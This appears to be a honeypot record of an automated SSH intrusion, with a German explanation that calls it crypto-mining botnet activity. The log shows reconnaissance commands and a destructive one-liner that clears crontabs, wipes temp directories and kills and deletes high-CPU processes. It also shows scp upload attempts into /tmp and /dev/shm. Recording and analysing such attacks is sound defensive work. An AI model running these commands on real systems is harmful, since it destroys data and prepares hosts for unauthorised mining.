08.10.2026, 04:44 UTC · 93 Befehle · über ssh · Niederlande
user='gl02' pass='1234567890' gl02@srv01:~$ uname -s -v -n -r -m Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64 gl02@srv01:~$ uname -m | awk '{printf $1}' x86_64 gl02@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }' 391 days, 00:00 gl02@srv01:~$ lspci | egrep VGA && lspci | grep 3D 00:02.0 VGA compatible controller: Intel Corporation Atom/Celeron/Pentium Processor x5-E8000/J3xxx/N3xxx Integrated Graphics Controller (rev 21) gl02@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14- Intel(R) Celeron(R) CPU J1900 @ 1.99GHz gl02@srv01:~$ curl ipinfo.io/org AS60751 gl02@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1 bash: nvidia-smi: command not found gl02@srv01:~$ nvidia-smi -q | grep "Product Name" bash: nvidia-smi: command not found gl02@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1 0 gl02@srv01:~$ uname -n | awk '{printf $1}' nas gl02@srv01:~$ uname -r | awk '{printf $1}' 4.19.0-25-amd64 gl02@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… bash: cache: command not found gl02@srv01:~$ echo 1234567890 > /tmp/d.log gl02@srv01:~$ scp -qt "/var/tmp/TJsFgAaE" gl02@srv01:~$ scp -qt "/tmp/TJsFgAaE" gl02@srv01:~$ scp -qt "/dev/shm/TJsFgAaE" gl02@srv01:~$ uname -s -v -n -r -m Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64 gl02@srv01:~$ scp -qt "/var/tmp/RkQRatYh" gl02@srv01:~$ scp -qt "/tmp/RkQRatYh" gl02@srv01:~$ scp -qt "/dev/shm/RkQRatYh" gl02@srv01:~$ uname -s -v -n -r -m Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64 gl02@srv01:~$ echo raspberry > /tmp/d.log gl02@srv01:~$ scp -qt "/var/tmp/sdoahyTF" gl02@srv01:~$ scp -qt "/tmp/sdoahyTF" gl02@srv01:~$ scp -qt "/dev/shm/sdoahyTF" gl02@srv01:~$ uname -s -v -n -r -m Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64 gl02@srv01:~$ echo odoo123 > /tmp/d.log gl02@srv01:~$ scp -qt "/var/tmp/WuBIGPtN" gl02@srv01:~$ scp -qt "/tmp/WuBIGPtN" gl02@srv01:~$ scp -qt "/dev/shm/WuBIGPtN" gl02@srv01:~$ uname -s -v -n -r -m Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64 gl02@srv01:~$ echo admin123 > /tmp/d.log gl02@srv01:~$ scp -qt "/var/tmp/bwdbQCkH" gl02@srv01:~$ scp -qt "/tmp/bwdbQCkH" gl02@srv01:~$ scp -qt "/dev/shm/bwdbQCkH" gl02@srv01:~$ uname -s -v -n -r -m Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64 gl02@srv01:~$ echo Qwerty > /tmp/d.log gl02@srv01:~$ scp -qt "/var/tmp/BgWUtqvq" gl02@srv01:~$ scp -qt "/tmp/BgWUtqvq"
Ein Angreifer meldete sich mit schwachen Zugangsdaten über SSH an. Er führte eine Reihe von Systemabfragen durch, um Hardware, CPU und GPU zu identifizieren. Anschließend versuchte er, Dateien in verschiedene temporäre Verzeichnisse zu kopieren und Prozesse mit hoher CPU-Auslastung zu beenden.
Die Befehle uname und lscpu sammeln Informationen über das Betriebssystem und die Prozessoren. Mit nvidia-smi und lspci prüft der Angreifer auf vorhandene Grafikkarten, die für das Mining von Kryptowährungen nötig sind. Der Befehl crontab -r löscht geplante Aufgaben, um Konkurrenz zu entfernen, während ps aux Prozesse mit hoher CPU-Nutzung identifiziert und kill -9 diese beendet. Die scp -qt Befehle versuchen, Dateien in versteckte Ordner zu übertragen, was auf das Hochladen von Schadsoftware hindeutet.
Das Ziel ist vermutlich die Installation von Kryptomining-Software oder einem Botnet-Client. Die intensive Prüfung der Grafikkarten deutet auf Mining hin, während das Beenden anderer Prozesse Platz für die eigene Last schaffen soll. Der Versuch, Dateien in /dev/shm zu schreiben, ist typisch für das Entpacken von Malware.
Dieses Muster ist sehr verbreitet und wird oft von automatisierten Skripten ausgeführt, die nach schwachen Passwörtern suchen. Die Kombination aus Hardware-Check und Prozess-Kill ist ein Standardverfahren für Kryptomining-Botnets.